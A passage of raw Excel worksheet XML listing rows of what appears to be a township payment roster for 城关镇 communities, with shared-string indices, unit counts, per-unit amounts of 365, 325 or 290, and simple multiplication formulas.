      <c r="D790" s="17" t="s">
        <v>2125</v>
      </c>
      <c r="E790" s="17" t="s">
        <v>923</v>
      </c>
      <c r="F790" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G790" s="17">
        <v>1</v>
      </c>
      <c r="H790" s="18">
        <v>365</v>
      </c>
      <c r="I790" s="17">
        <f t="shared" si="36"/>
        <v>365</v>
      </c>
      <c r="J790" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K790" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="791" customHeight="1" spans="1:11">
      <c r="A791" s="16" t="s">
        <v>2126</v>
      </c>
      <c r="B791" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C791" s="17" t="s">
        <v>1688</v>
      </c>
      <c r="D791" s="17" t="s">
        <v>2127</v>
      </c>
      <c r="E791" s="17" t="s">
        <v>773</v>
      </c>
      <c r="F791" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G791" s="17">
        <v>1</v>
      </c>
      <c r="H791" s="18">
        <v>365</v>
      </c>
      <c r="I791" s="17">
        <f t="shared" si="36"/>
        <v>365</v>
      </c>
      <c r="J791" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K791" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="792" customHeight="1" spans="1:11">
      <c r="A792" s="16" t="s">
        <v>2128</v>
      </c>
      <c r="B792" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C792" s="17" t="s">
        <v>2129</v>
      </c>
      <c r="D792" s="17" t="s">
        <v>2130</v>
      </c>
      <c r="E792" s="17" t="s">
        <v>306</v>
      </c>
      <c r="F792" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G792" s="17">
        <v>1</v>
      </c>
      <c r="H792" s="18">
        <v>365</v>
      </c>
      <c r="I792" s="17">
        <f t="shared" si="36"/>
        <v>365</v>
      </c>
      <c r="J792" s="29">
        <v>45108</v>
      </c>
      <c r="K792" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="793" customHeight="1" spans="1:11">
      <c r="A793" s="16" t="s">
        <v>2131</v>
      </c>
      <c r="B793" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C793" s="17" t="s">
        <v>2132</v>
      </c>
      <c r="D793" s="17" t="s">
        <v>2133</v>
      </c>
      <c r="E793" s="17" t="s">
        <v>265</v>
      </c>
      <c r="F793" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G793" s="17">
        <v>1</v>
      </c>
      <c r="H793" s="18">
        <v>365</v>
      </c>
      <c r="I793" s="17">
        <f t="shared" si="36"/>
        <v>365</v>
      </c>
      <c r="J793" s="29">
        <v>45108</v>
      </c>
      <c r="K793" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="794" customHeight="1" spans="1:11">
      <c r="A794" s="16" t="s">
        <v>2134</v>
      </c>
      <c r="B794" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C794" s="17" t="s">
        <v>2135</v>
      </c>
      <c r="D794" s="17" t="s">
        <v>2136</v>
      </c>
      <c r="E794" s="17" t="s">
        <v>340</v>
      </c>
      <c r="F794" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G794" s="17">
        <v>1</v>
      </c>
      <c r="H794" s="18">
        <v>365</v>
      </c>
      <c r="I794" s="17">
        <f t="shared" si="36"/>
        <v>365</v>
      </c>
      <c r="J794" s="29">
        <v>45108</v>
      </c>
      <c r="K794" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="795" customHeight="1" spans="1:11">
      <c r="A795" s="16" t="s">
        <v>2137</v>
      </c>
      <c r="B795" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C795" s="17" t="s">
        <v>2138</v>
      </c>
      <c r="D795" s="17" t="s">
        <v>2139</v>
      </c>
      <c r="E795" s="17" t="s">
        <v>337</v>
      </c>
      <c r="F795" s="17" t="s">
        <v>1975</v>
      </c>
      <c r="G795" s="17">
        <v>2</v>
      </c>
      <c r="H795" s="18">
        <v>325</v>
      </c>
      <c r="I795" s="17">
        <f t="shared" si="36"/>
        <v>650</v>
      </c>
      <c r="J795" s="29">
        <v>45108</v>
      </c>
      <c r="K795" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="796" customHeight="1" spans="1:11">
      <c r="A796" s="16" t="s">
        <v>2140</v>
      </c>
      <c r="B796" s="17" t="str">
        <f>B795</f>
        <v>城关镇</v>
      </c>
      <c r="C796" s="17" t="str">
        <f>C795</f>
        <v>南外社区中医院</v>
      </c>
      <c r="D796" s="23" t="s">
        <v>2141</v>
      </c>
      <c r="E796" s="23" t="s">
        <v>416</v>
      </c>
      <c r="F796" s="17" t="str">
        <f>F795</f>
        <v>4113210104</v>
      </c>
      <c r="G796" s="17"/>
      <c r="H796" s="17"/>
      <c r="I796" s="17"/>
      <c r="J796" s="29"/>
      <c r="K796" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="797" customHeight="1" spans="1:11">
      <c r="A797" s="16" t="s">
        <v>2142</v>
      </c>
      <c r="B797" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C797" s="17" t="s">
        <v>2143</v>
      </c>
      <c r="D797" s="17" t="s">
        <v>2144</v>
      </c>
      <c r="E797" s="17" t="s">
        <v>1694</v>
      </c>
      <c r="F797" s="17" t="s">
        <v>1975</v>
      </c>
      <c r="G797" s="17">
        <v>3</v>
      </c>
      <c r="H797" s="18">
        <v>290</v>
      </c>
      <c r="I797" s="17">
        <f>H797*G797</f>
        <v>870</v>
      </c>
      <c r="J797" s="29">
        <v>45108</v>
      </c>
      <c r="K797" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="798" customHeight="1" spans="1:11">
      <c r="A798" s="16" t="s">
        <v>2145</v>
      </c>
      <c r="B798" s="17" t="str">
        <f>B797</f>
        <v>城关镇</v>
      </c>
      <c r="C798" s="17" t="str">
        <f>C797</f>
        <v>南外社区印刷厂</v>
      </c>
      <c r="D798" s="16" t="s">
        <v>2146</v>
      </c>
      <c r="E798" s="16" t="s">
        <v>2147</v>
      </c>
      <c r="F798" s="17" t="str">
        <f>F797</f>
        <v>4113210104</v>
      </c>
      <c r="G798" s="17"/>
      <c r="H798" s="17"/>
      <c r="I798" s="17"/>
      <c r="J798" s="29"/>
      <c r="K798" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="799" customHeight="1" spans="1:11">
      <c r="A799" s="16" t="s">
        <v>2148</v>
      </c>
      <c r="B799" s="17" t="str">
        <f>B798</f>
        <v>城关镇</v>
      </c>
      <c r="C799" s="17" t="str">
        <f>C798</f>
        <v>南外社区印刷厂</v>
      </c>
      <c r="D799" s="16" t="s">
        <v>2149</v>
      </c>
      <c r="E799" s="16" t="s">
        <v>2150</v>
      </c>
      <c r="F799" s="17" t="str">
        <f>F798</f>
        <v>4113210104</v>
      </c>
      <c r="G799" s="17"/>
      <c r="H799" s="17"/>
      <c r="I799" s="17"/>
      <c r="J799" s="29"/>
      <c r="K799" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="800" customHeight="1" spans="1:11">
      <c r="A800" s="16" t="s">
        <v>2151</v>
      </c>
      <c r="B800" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C800" s="17" t="s">
        <v>2143</v>
      </c>
      <c r="D800" s="17" t="s">
        <v>2152</v>
      </c>
      <c r="E800" s="17" t="s">
        <v>2153</v>
      </c>
      <c r="F800" s="17" t="s">
        <v>1975</v>
      </c>
      <c r="G800" s="17">
        <v>2</v>
      </c>
      <c r="H800" s="18">
        <v>325</v>
      </c>
      <c r="I800" s="17">
        <f>H800*G800</f>
        <v>650</v>
      </c>
      <c r="J800" s="29">
        <v>45108</v>
      </c>
      <c r="K800" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="801" customHeight="1" spans="1:11">
      <c r="A801" s="16" t="s">
        <v>2154</v>
      </c>
      <c r="B801" s="17" t="str">
        <f>B800</f>
        <v>城关镇</v>
      </c>
      <c r="C801" s="17" t="str">
        <f>C800</f>
        <v>南外社区印刷厂</v>
      </c>
      <c r="D801" s="23" t="s">
        <v>2155</v>
      </c>
      <c r="E801" s="23" t="s">
        <v>2156</v>
      </c>
      <c r="F801" s="17" t="str">
        <f>F800</f>
        <v>4113210104</v>
      </c>
      <c r="G801" s="17"/>
      <c r="H801" s="17"/>
      <c r="I801" s="17"/>
      <c r="J801" s="29"/>
      <c r="K801" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="802" customHeight="1" spans="1:11">
      <c r="A802" s="16" t="s">
        <v>2157</v>
      </c>
      <c r="B802" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C802" s="17" t="s">
        <v>2143</v>
      </c>
      <c r="D802" s="17" t="s">
        <v>2158</v>
      </c>
      <c r="E802" s="17" t="s">
        <v>2159</v>
      </c>
      <c r="F802" s="17" t="s">
        <v>1975</v>
      </c>
      <c r="G802" s="17">
        <v>1</v>
      </c>
      <c r="H802" s="18">
        <v>365</v>
      </c>
      <c r="I802" s="17">
        <f>H802*G802</f>
        <v>365</v>
      </c>
      <c r="J802" s="29">
        <v>45108</v>
      </c>
      <c r="K802" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="803" customHeight="1" spans="1:11">
      <c r="A803" s="16" t="s">
        <v>2160</v>
      </c>
      <c r="B803" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C803" s="17" t="s">
        <v>2161</v>
      </c>
      <c r="D803" s="17" t="s">
        <v>2162</v>
      </c>
      <c r="E803" s="17" t="s">
        <v>331</v>
      </c>
      <c r="F803" s="17" t="s">
        <v>1975</v>
      </c>
      <c r="G803" s="17">
        <v>1</v>
      </c>
      <c r="H803" s="18">
        <v>365</v>
      </c>
      <c r="I803" s="17">
        <f>H803*G803</f>
        <v>365</v>
      </c>
      <c r="J803" s="29">
        <v>45108</v>
      </c>
      <c r="K803" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="804" customHeight="1" spans="1:11">
      <c r="A804" s="16" t="s">
        <v>2163</v>
      </c>
      <c r="B804" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C804" s="17" t="s">
        <v>2143</v>
      </c>
      <c r="D804" s="17" t="s">
        <v>2164</v>
      </c>
      <c r="E804" s="17" t="s">
        <v>2165</v>
      </c>
      <c r="F804" s="17" t="s">
        <v>1975</v>
      </c>
      <c r="G804" s="17">
        <v>1</v>
      </c>
      <c r="H804" s="18">
        <v>365</v>
      </c>
      <c r="I804" s="17">
        <f>H804*G804</f>
        <v>365</v>
      </c>
      <c r="J804" s="29">
        <v>45108</v>
      </c>
      <c r="K804" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="805" customHeight="1" spans="1:11">
      <c r="A805" s="16" t="s">
        <v>2166</v>
      </c>
      <c r="B805" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C805" s="17" t="s">
        <v>2167</v>
      </c>
      <c r="D805" s="17" t="s">
        <v>2168</v>
      </c>
      <c r="E805" s="17" t="s">
        <v>542</v>
      </c>
      <c r="F805" s="17" t="s">
        <v>1975</v>
      </c>
      <c r="G805" s="17">
        <v>1</v>
      </c>
      <c r="H805" s="18">
        <v>365</v>
      </c>
      <c r="I805" s="17">
        <f>H805*G805</f>
        <v>365</v>
      </c>
      <c r="J805" s="29">
        <v>45108</v>
      </c>
      <c r="K805" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="806" customHeight="1" spans="1:11">
      <c r="A806" s="16" t="s">
        <v>2169</v>
      </c>
      <c r="B806" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C806" s="17" t="s">
        <v>2170</v>
      </c>
      <c r="D806" s="17" t="s">
        <v>2171</v>
      </c>
      <c r="E806" s="17" t="s">
        <v>2172</v>
      </c>
      <c r="F806" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G806" s="17">
        <v>2</v>
      </c>
      <c r="H806" s="18">
        <v>325</v>
      </c>
      <c r="I806" s="17">
        <f>H806*G806</f>
        <v>650</v>
      </c>
      <c r="J806" s="29">
        <v>45108</v>
      </c>
      <c r="K806" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="807" customHeight="1" spans="1:11">
      <c r="A807" s="16" t="s">
        <v>2173</v>
      </c>
      <c r="B807" s="17" t="str">
        <f>B806</f>
        <v>城关镇</v>
      </c>
      <c r="C807" s="17" t="str">
        <f>C806</f>
        <v>西北社区商业中心</v>
      </c>
      <c r="D807" s="23" t="s">
        <v>2174</v>
      </c>
      <c r="E807" s="23" t="s">
        <v>521</v>
      </c>
      <c r="F807" s="17" t="str">
        <f>F806</f>
        <v>4113210106</v>
      </c>
      <c r="G807" s="17"/>
      <c r="H807" s="17"/>
      <c r="I807" s="17"/>
      <c r="J807" s="29"/>
      <c r="K807" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="808" customHeight="1" spans="1:11">
      <c r="A808" s="16" t="s">
        <v>2175</v>
      </c>
      <c r="B808" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C808" s="17" t="s">
        <v>2176</v>
      </c>
      <c r="D808" s="17" t="s">
        <v>2177</v>
      </c>
      <c r="E808" s="17" t="s">
        <v>780</v>
      </c>
      <c r="F808" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G808" s="17">
        <v>1</v>
      </c>
      <c r="H808" s="18">
        <v>365</v>
      </c>
      <c r="I808" s="17">
        <f t="shared" ref="I808:I813" si="37">H808*G808</f>
        <v>365</v>
      </c>
      <c r="J808" s="29">
        <v>45108</v>
      </c>
      <c r="K808" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="809" customHeight="1" spans="1:11">
      <c r="A809" s="16" t="s">
        <v>2178</v>
      </c>
      <c r="B809" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C809" s="17" t="s">
        <v>2179</v>
      </c>
      <c r="D809" s="17" t="s">
        <v>2180</v>
      </c>
      <c r="E809" s="17" t="s">
        <v>292</v>
      </c>
      <c r="F809" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G809" s="17">
        <v>1</v>
      </c>
      <c r="H809" s="18">
        <v>365</v>
      </c>
      <c r="I809" s="17">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J809" s="29">
        <v>45108</v>
      </c>
      <c r="K809" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="810" customHeight="1" spans="1:11">
      <c r="A810" s="16" t="s">
        <v>2181</v>
      </c>
      <c r="B810" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C810" s="17" t="s">
        <v>2176</v>
      </c>
      <c r="D810" s="17" t="s">
        <v>2182</v>
      </c>
      <c r="E810" s="17" t="s">
        <v>2183</v>
      </c>
      <c r="F810" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G810" s="17">
        <v>1</v>
      </c>
      <c r="H810" s="18">
        <v>365</v>
      </c>
      <c r="I810" s="17">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J810" s="29">
        <v>45108</v>
      </c>
      <c r="K810" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="811" customHeight="1" spans="1:11">
      <c r="A811" s="16" t="s">
        <v>2184</v>
      </c>
      <c r="B811" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C811" s="17" t="s">
        <v>2179</v>
      </c>
      <c r="D811" s="17" t="s">
        <v>2185</v>
      </c>
      <c r="E811" s="17" t="s">
        <v>306</v>
      </c>
      <c r="F811" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G811" s="17">
        <v>1</v>
      </c>
      <c r="H811" s="18">
        <v>365</v>
      </c>
      <c r="I811" s="17">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J811" s="29">
        <v>45108</v>
      </c>
      <c r="K811" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="812" customHeight="1" spans="1:11">
      <c r="A812" s="16" t="s">
        <v>2186</v>
      </c>
      <c r="B812" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C812" s="17" t="s">
        <v>2170</v>
      </c>
      <c r="D812" s="17" t="s">
        <v>2187</v>
      </c>
      <c r="E812" s="17" t="s">
        <v>675</v>
      </c>
      <c r="F812" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G812" s="17">
        <v>1</v>
      </c>
      <c r="H812" s="18">
        <v>365</v>
      </c>
      <c r="I812" s="17">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J812" s="29">
        <v>45108</v>
      </c>
      <c r="K812" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="813" customHeight="1" spans="1:11">
      <c r="A813" s="16" t="s">
        <v>2188</v>
      </c>
      <c r="B813" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C813" s="17" t="s">
        <v>2189</v>
      </c>
      <c r="D813" s="17" t="s">
        <v>2190</v>
      </c>
      <c r="E813" s="17" t="s">
        <v>1196</v>
      </c>
      <c r="F813" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G813" s="17">
        <v>2</v>
      </c>
      <c r="H813" s="18">
        <v>325</v>
      </c>
      <c r="I813" s="17">
        <f t="shared" si="37"/>
        <v>650</v>
      </c>
      <c r="J813" s="29">
        <v>45108</v>
      </c>
      <c r="K813" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="814" customHeight="1" spans="1:11">
      <c r="A814" s="16" t="s">
        <v>2191</v>
      </c>
      <c r="B814" s="17" t="str">
        <f>B813</f>
        <v>城关镇</v>
      </c>
      <c r="C814" s="17" t="str">
        <f>C813</f>
        <v>西北社区教育局</v>
      </c>
      <c r="D814" s="16" t="s">
        <v>2192</v>
      </c>
      <c r="E814" s="16" t="s">
        <v>2193</v>
      </c>
      <c r="F814" s="17" t="str">
        <f>F813</f>
        <v>4113210106</v>
      </c>
      <c r="G814" s="17"/>
      <c r="H814" s="17"/>
      <c r="I814" s="17"/>
      <c r="J814" s="29"/>
      <c r="K814" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="815" customHeight="1" spans="1:11">
      <c r="A815" s="16" t="s">
        <v>2194</v>
      </c>
      <c r="B815" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C815" s="17" t="s">
        <v>2179</v>
      </c>
      <c r="D815" s="17" t="s">
        <v>2195</v>
      </c>
      <c r="E815" s="17" t="s">
        <v>306</v>
      </c>
      <c r="F815" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G815" s="17">
        <v>1</v>
      </c>
      <c r="H815" s="18">
        <v>365</v>
      </c>
      <c r="I815" s="17">
        <f t="shared" ref="I815:I830" si="38">H815*G815</f>
        <v>365</v>
      </c>
      <c r="J815" s="29">
        <v>45108</v>
      </c>
      <c r="K815" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="816" customHeight="1" spans="1:11">
      <c r="A816" s="16" t="s">
        <v>2196</v>
      </c>
      <c r="B816" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C816" s="17" t="s">
        <v>2189</v>
      </c>
      <c r="D816" s="17" t="s">
        <v>2197</v>
      </c>
      <c r="E816" s="17" t="s">
        <v>2198</v>
      </c>
      <c r="F816" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G816" s="17">
        <v>1</v>
      </c>
      <c r="H816" s="18">
        <v>365</v>
      </c>
      <c r="I816" s="17">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J816" s="29">
        <v>45108</v>
      </c>
      <c r="K816" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="817" customHeight="1" spans="1:11">
      <c r="A817" s="16" t="s">
        <v>2199</v>
      </c>
      <c r="B817" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C817" s="17" t="s">
        <v>2176</v>
      </c>
      <c r="D817" s="17" t="s">
        <v>2200</v>
      </c>
      <c r="E817" s="17" t="s">
        <v>2201</v>
      </c>
      <c r="F817" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G817" s="17">
        <v>1</v>
      </c>
      <c r="H817" s="18">
        <v>365</v>
      </c>
      <c r="I817" s="17">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J817" s="29">
        <v>45108</v>
      </c>
      <c r="K817" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="818" customHeight="1" spans="1:11">
      <c r="A818" s="16" t="s">
        <v>2202</v>
      </c>
      <c r="B818" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C818" s="17" t="s">
        <v>2170</v>
      </c>
      <c r="D818" s="17" t="s">
        <v>2203</v>
      </c>
      <c r="E818" s="17" t="s">
        <v>382</v>
      </c>
      <c r="F818" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G818" s="17">
        <v>1</v>
      </c>
      <c r="H818" s="18">
        <v>365</v>
      </c>
      <c r="I818" s="17">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J818" s="29">
        <v>45108</v>
      </c>
      <c r="K818" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="819" customHeight="1" spans="1:11">
      <c r="A819" s="16" t="s">
        <v>2204</v>
      </c>
      <c r="B819" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C819" s="17" t="s">
        <v>2189</v>
      </c>
      <c r="D819" s="17" t="s">
        <v>2205</v>
      </c>
      <c r="E819" s="17" t="s">
        <v>340</v>
      </c>
      <c r="F819" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G819" s="17">
        <v>1</v>
      </c>
      <c r="H819" s="18">
        <v>365</v>
      </c>
      <c r="I819" s="17">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J819" s="29">
        <v>45108</v>
      </c>
      <c r="K819" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="820" customHeight="1" spans="1:11">
      <c r="A820" s="16" t="s">
        <v>2206</v>
      </c>
      <c r="B820" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C820" s="17" t="s">
        <v>2207</v>
      </c>
      <c r="D820" s="17" t="s">
        <v>2208</v>
      </c>
      <c r="E820" s="17" t="s">
        <v>405</v>
      </c>
      <c r="F820" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G820" s="17">
        <v>1</v>
      </c>
      <c r="H820" s="18">
        <v>365</v>
      </c>
      <c r="I820" s="17">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J820" s="29">
        <v>45108</v>
      </c>
      <c r="K820" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="821" customHeight="1" spans="1:11">
      <c r="A821" s="16" t="s">
        <v>2209</v>
      </c>
      <c r="B821" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C821" s="17" t="s">
        <v>2179</v>
      </c>
      <c r="D821" s="17" t="s">
        <v>2210</v>
      </c>
      <c r="E821" s="17" t="s">
        <v>303</v>
      </c>
      <c r="F821" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G821" s="17">
        <v>1</v>
      </c>
      <c r="H821" s="18">
        <v>365</v>
      </c>
      <c r="I821" s="17">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J821" s="29">
        <v>45108</v>
      </c>
      <c r="K821" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="822" customHeight="1" spans="1:11">
      <c r="A822" s="16" t="s">
        <v>2211</v>
      </c>
      <c r="B822" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C822" s="17" t="s">
        <v>2189</v>
      </c>
      <c r="D822" s="17" t="s">
        <v>2212</v>
      </c>
      <c r="E822" s="17" t="s">
        <v>1704</v>
      </c>
      <c r="F822" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G822" s="17">
        <v>1</v>
      </c>
      <c r="H822" s="18">
        <v>365</v>
      </c>
      <c r="I822" s="17">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J822" s="29">
        <v>45108</v>
      </c>
      <c r="K822" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="823" customHeight="1" spans="1:11">
      <c r="A823" s="16" t="s">
        <v>2213</v>
      </c>
      <c r="B823" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C823" s="17" t="s">
        <v>2207</v>
      </c>
      <c r="D823" s="17" t="s">
        <v>2214</v>
      </c>
      <c r="E823" s="17" t="s">
        <v>236</v>
      </c>
      <c r="F823" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G823" s="17">
        <v>1</v>
      </c>
      <c r="H823" s="18">
        <v>365</v>
      </c>
      <c r="I823" s="17">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J823" s="29">
        <v>45108</v>
      </c>
      <c r="K823" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="824" customHeight="1" spans="1:11">
      <c r="A824" s="16" t="s">
        <v>2215</v>
      </c>
      <c r="B824" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C824" s="17" t="s">
        <v>2207</v>
      </c>
      <c r="D824" s="17" t="s">
        <v>2216</v>
      </c>
      <c r="E824" s="17" t="s">
        <v>2217</v>
      </c>
      <c r="F824" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G824" s="17">
        <v>1</v>
      </c>
      <c r="H824" s="18">
        <v>365</v>
      </c>
      <c r="I824" s="17">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J824" s="29">
        <v>45108</v>
      </c>
      <c r="K824" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="825" customHeight="1" spans="1:11">
      <c r="A825" s="16" t="s">
        <v>2218</v>
      </c>
      <c r="B825" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C825" s="17" t="s">
        <v>2207</v>
      </c>
      <c r="D825" s="17" t="s">
        <v>2219</v>
      </c>
      <c r="E825" s="17" t="s">
        <v>2220</v>
      </c>
      <c r="F825" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G825" s="17">
        <v>1</v>
      </c>
      <c r="H825" s="18">
        <v>365</v>
      </c>
      <c r="I825" s="17">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J825" s="29">
        <v>45108</v>
      </c>
      <c r="K825" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="826" customHeight="1" spans="1:11">
      <c r="A826" s="16" t="s">
        <v>2221</v>
      </c>
      <c r="B826" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C826" s="17" t="s">
        <v>2207</v>
      </c>
      <c r="D826" s="17" t="s">
        <v>2222</v>
      </c>
      <c r="E826" s="17" t="s">
        <v>2223</v>
      </c>
      <c r="F826" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G826" s="17">
        <v>1</v>
      </c>
      <c r="H826" s="18">
        <v>365</v>
      </c>
      <c r="I826" s="17">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J826" s="29">
        <v>45108</v>
      </c>
      <c r="K826" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="827" customHeight="1" spans="1:11">
      <c r="A827" s="16" t="s">
        <v>2224</v>
      </c>
      <c r="B827" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C827" s="17" t="s">
        <v>2170</v>
      </c>
      <c r="D827" s="17" t="s">
        <v>2225</v>
      </c>
      <c r="E827" s="17" t="s">
        <v>269</v>
      </c>
      <c r="F827" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G827" s="17">
        <v>1</v>
      </c>
      <c r="H827" s="18">
        <v>365</v>
      </c>
      <c r="I827" s="17">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J827" s="29">
        <v>45108</v>
      </c>
      <c r="K827" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="828" customHeight="1" spans="1:11">
      <c r="A828" s="16" t="s">
        <v>2226</v>
      </c>
      <c r="B828" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C828" s="17" t="s">
        <v>2207</v>
      </c>
      <c r="D828" s="17" t="s">
        <v>2227</v>
      </c>
      <c r="E828" s="17" t="s">
        <v>563</v>
      </c>
      <c r="F828" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G828" s="17">
        <v>1</v>
      </c>
      <c r="H828" s="18">
        <v>365</v>
      </c>
      <c r="I828" s="17">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J828" s="29">
        <v>45108</v>
      </c>
      <c r="K828" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="829" customHeight="1" spans="1:11">
      <c r="A829" s="16" t="s">
        <v>2228</v>
      </c>
      <c r="B829" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C829" s="17" t="s">
        <v>2207</v>
      </c>
      <c r="D829" s="17" t="s">
        <v>2229</v>
      </c>
      <c r="E829" s="17" t="s">
        <v>1336</v>
      </c>
      <c r="F829" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G829" s="17">
        <v>1</v>
      </c>
      <c r="H829" s="18">
        <v>365</v>
      </c>
      <c r="I829" s="17">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J829" s="29">
        <v>45108</v>
      </c>
      <c r="K829" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="830" customHeight="1" spans="1:11">
      <c r="A830" s="16" t="s">
        <v>2230</v>
      </c>
      <c r="B830" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C830" s="17" t="s">
        <v>2207</v>
      </c>
      <c r="D830" s="17" t="s">
        <v>2231</v>
      </c>
      <c r="E830" s="17" t="s">
        <v>2232</v>
      </c>
      <c r="F830" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G830" s="17">
        <v>1</v>
      </c>
      <c r="H830" s="18">
        <v>365</v>
      </c>
      <c r="I830" s="17">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J830" s="29">
        <v>45108</v>
      </c>
      <c r="K830" s="17" t="s">
